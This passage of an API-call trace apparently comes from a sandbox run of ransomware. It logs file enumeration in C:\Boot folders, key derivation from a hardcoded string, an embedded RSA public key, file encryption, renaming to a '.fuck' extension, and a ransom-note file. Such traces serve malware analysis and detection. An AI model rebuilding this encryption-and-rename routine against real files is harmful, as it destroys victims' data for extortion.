lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.271] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.271] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.271] GetLastError () returned 0x12 [0231.271] SetLastError (dwErrCode=0x12) [0231.271] GetLastError () returned 0x12 [0231.271] SetLastError (dwErrCode=0x12) [0231.271] GetLastError () returned 0x12 [0231.271] SetLastError (dwErrCode=0x12) [0231.271] GetLastError () returned 0x12 [0231.271] SetLastError (dwErrCode=0x12) [0231.271] GetLastError () returned 0x12 [0231.271] SetLastError (dwErrCode=0x12) [0231.271] GetLastError () returned 0x12 [0231.271] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.272] SetLastError (dwErrCode=0x12) [0231.272] GetLastError () returned 0x12 [0231.273] SetLastError (dwErrCode=0x12) [0231.273] GetLastError () returned 0x12 [0231.273] SetLastError (dwErrCode=0x12) [0231.273] GetLastError () returned 0x12 [0231.273] SetLastError (dwErrCode=0x12) [0231.273] GetLastError () returned 0x12 [0231.273] SetLastError (dwErrCode=0x12) [0231.273] GetLastError () returned 0x12 [0231.273] SetLastError (dwErrCode=0x12) [0231.273] GetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0231.273] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.273] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.273] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.274] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.274] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b610) returned 1 [0231.276] CryptCreateHash (in: hProv=0x275b610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.276] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.276] CryptHashData (hHash=0x394e68, pbData=0x2ec968, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.276] CryptDeriveKey (in: hProv=0x275b610, Algid=0x6610, hBaseData=0x394e68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.277] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.277] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.277] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b698) returned 1 [0231.277] CryptImportPublicKeyInfo (in: hCryptProv=0x275b698, dwCertEncodingType=0x1, pInfo=0x27612f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2761320*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2761328*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394ba8) returned 1 [0231.277] CryptEncrypt (in: hKey=0x394ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.277] CryptEncrypt (in: hKey=0x394ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275bbe8*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275bbe8*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.278] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275bbe8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.278] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2763190, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2763190, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.278] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2763190*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2763190*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.278] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2763190, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.278] CloseHandle (hObject=0xffffffff) returned 1 [0231.278] CloseHandle (hObject=0xffffffff) returned 1 [0231.278] CopyFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.278] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.278] DeleteFileA (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.gsg")) returned 0 [0231.279] MoveFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.fuck")) returned 0 [0231.279] CryptDestroyHash (hHash=0x394e68) returned 1 [0231.279] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.279] CryptReleaseContext (hProv=0x275b610, dwFlags=0x0) returned 1 [0231.279] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.279] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.279] GetLastError () returned 0x5 [0231.279] SetLastError (dwErrCode=0x5) [0231.279] GetLastError () returned 0x5 [0231.279] SetLastError (dwErrCode=0x5) [0231.279] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.280] GetLastError () returned 0x5 [0231.280] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetLastError () returned 0x5 [0231.281] SetLastError (dwErrCode=0x5) [0231.281] GetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui")) returned 0x20 [0231.282] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.282] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.282] CreateFileA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.283] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.283] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275b610) returned 1 [0231.285] CryptCreateHash (in: hProv=0x275b610, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.285] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.285] CryptHashData (hHash=0x394a68, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.285] CryptDeriveKey (in: hProv=0x275b610, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394be8) returned 1 [0231.285] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.285] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.285] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275ba50) returned 1 [0231.286] CryptImportPublicKeyInfo (in: hCryptProv=0x275ba50, dwCertEncodingType=0x1, pInfo=0x2760e10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2760e40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2760e48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x394e68) returned 1 [0231.286] CryptEncrypt (in: hKey=0x394e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.286] CryptEncrypt (in: hKey=0x394e68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275b2e0*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275b2e0*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.286] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275b2e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.286] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27647a0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x27647a0, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.286] CryptEncrypt (in: hKey=0x394be8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27647a0*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x27647a0*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.286] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27647a0, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.286] CloseHandle (hObject=0xffffffff) returned 1 [0231.286] CloseHandle (hObject=0xffffffff) returned 1 [0231.287] CopyFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), bFailIfExists=0) returned 0 [0231.287] SetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui", dwFileAttributes=0x0) returned 0 [0231.287] DeleteFileA (lpFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.gsg" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.gsg")) returned 0 [0231.287] MoveFileA (lpExistingFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui" (normalized: "c:\\boot\\de-de\\memtest.exe.mui"), lpNewFileName="C:\\\\Boot\\de-DE\\memtest.exe.mui.fuck" (normalized: "c:\\boot\\de-de\\memtest.exe.mui.fuck")) returned 0 [0231.288] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.288] CryptDestroyKey (hKey=0x394be8) returned 1 [0231.288] CryptReleaseContext (hProv=0x275b610, dwFlags=0x0) returned 1 [0231.288] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.288] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0231.288] FindClose (in: hFindFile=0x3949a8 | out: hFindFile=0x3949a8) returned 1 [0231.288] GetFileAttributesA (lpFileName="C:\\\\Boot\\de-DE\\README_BACK_FILES.htm" (normalized: "c:\\boot\\de-de\\readme_back_files.htm")) returned 0x20 [0231.288] FindNextFileA (in: hFindFile=0x394b28, lpFindFileData=0x2b9f898 | out: lpFindFileData=0x2b9f898) returned 1 [0231.288] FindFirstFileA (in: lpFileName="C:\\\\Boot\\el-GR\\*.*", lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0x3949a8 [0231.291] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.291] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.291] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.291] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.292] SetLastError (dwErrCode=0x12) [0231.292] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetLastError () returned 0x12 [0231.293] SetLastError (dwErrCode=0x12) [0231.293] GetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0231.294] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0231.294] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.294] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.294] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 0 [0231.295] CryptAcquireContextA (in: phProv=0x2b9e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9e408*=0x275bb60) returned 1 [0231.297] CryptCreateHash (in: hProv=0x275bb60, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9e40c | out: phHash=0x2b9e40c) returned 1 [0231.297] lstrlenA (lpString="IMzNncNvfkpiBaOkwSdvfXlDzMlQm") returned 29 [0231.297] CryptHashData (hHash=0x394a68, pbData=0x2ec828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0231.297] CryptDeriveKey (in: hProv=0x275bb60, Algid=0x6610, hBaseData=0x394a68, dwFlags=0x1000000, phKey=0x2b9e3f8 | out: phKey=0x2b9e3f8*=0x394d28) returned 1 [0231.297] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9e414, pcbBinary=0x2b9e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0231.297] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0 | out: pvStructInfo=0x2b9e3e8, pcbStructInfo=0x2b9e3f0) returned 1 [0231.297] CryptAcquireContextA (in: phProv=0x2b9e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9e404*=0x275b368) returned 1 [0231.298] CryptImportPublicKeyInfo (in: hCryptProv=0x275b368, dwCertEncodingType=0x1, pInfo=0x2761150*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2761180*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2761188*, PublicKey.cUnusedBits=0x0), phKey=0x2b9e3fc | out: phKey=0x2b9e3fc*=0x3944a8) returned 1 [0231.298] CryptEncrypt (in: hKey=0x3944a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9e3ec*=0x80) returned 1 [0231.298] CryptEncrypt (in: hKey=0x3944a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275bd80*, pdwDataLen=0x2b9e400*=0x18, dwBufLen=0x80 | out: pbData=0x275bd80*, pdwDataLen=0x2b9e400*=0x80) returned 1 [0231.298] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275bd80, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.298] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2764da8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9e410, lpOverlapped=0x0 | out: lpBuffer=0x2764da8, lpNumberOfBytesRead=0x2b9e410*=0x0, lpOverlapped=0x0) returned 0 [0231.298] CryptEncrypt (in: hKey=0x394d28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2764da8*, pdwDataLen=0x2b9e410*=0x0, dwBufLen=0x400 | out: pbData=0x2764da8*, pdwDataLen=0x2b9e410*=0x10) returned 1 [0231.298] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2764da8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e410, lpOverlapped=0x0) returned 0 [0231.298] CloseHandle (hObject=0xffffffff) returned 1 [0231.298] CloseHandle (hObject=0xffffffff) returned 1 [0231.298] CopyFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0231.299] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0231.299] DeleteFileA (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.gsg")) returned 0 [0231.299] MoveFileA (lpExistingFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.fuck")) returned 0 [0231.299] CryptDestroyHash (hHash=0x394a68) returned 1 [0231.299] CryptDestroyKey (hKey=0x394d28) returned 1 [0231.300] CryptReleaseContext (hProv=0x275bb60, dwFlags=0x0) returned 1 [0231.300] FindNextFileA (in: hFindFile=0x3949a8, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0231.300] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9f40c | out: lpSystemTimeAsFileTime=0x2b9f40c) [0231.300] GetLastError () returned 0x5 [0231.300] SetLastError (dwErrCode=0x5) [0231.300] GetLastError () returned 0x5 [0231.300] SetLastError (dwErrCode=0x5) [0231.300] GetLastError () returned 0x5 [0231.300] SetLastError (dwErrCode=0x5) [0231.300] GetLastError () returned 0x5 [0231.300] SetLastError (dwErrCode=0x5) [0231.300] GetLastError () returned 0x5 [0231.300] SetLastError (dwErrCode=0x5) [0231.300] GetLastError () returned 0x5 [0231.300] GetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui")) returned 0x20 [0231.300] SetFileAttributesA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui", dwFileAttributes=0x80) returned 0 [0231.301] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.301] CreateFileA (lpFileName="C:\\\\Boot\\el-GR\\memtest.exe.mui.gsg" (normalized: 